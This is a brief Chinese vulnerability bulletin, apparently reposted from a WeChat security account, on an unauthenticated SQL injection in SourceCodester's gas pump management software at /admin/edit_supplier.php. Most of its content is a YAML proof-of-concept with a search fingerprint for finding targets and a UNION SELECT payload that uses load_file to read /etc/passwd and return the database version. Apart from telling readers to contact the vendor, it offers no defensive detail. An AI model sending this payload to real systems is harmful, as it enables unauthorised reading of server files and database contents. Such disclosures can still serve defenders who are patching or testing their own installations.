SOURCECODESTER / 汽油泵管理软件 - edit_supplier.php 存在未经身份验证的 SQL 注入,攻击者可利用该漏洞获取数据库敏感信息。
SourceCodester
搜索引擎语法
app="SourceCodester"
POC
name: poc-yaml-sql
level: 2
finger: ''
rules:
method: POST
path: /admin/edit_supplier.php
body: id=1'+UNION+SELECT+1,load_file('/etc/passwd'),3,4,version(),6,7--+-
expression: |
= 200 =
detail:
author: ''
tvul_id: .nan
联系厂商获取加固建议
原文始发于微信公众号(极星信安):安全情报,SourceCodester 汽油泵管理软件 edit_supplier SQL 注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论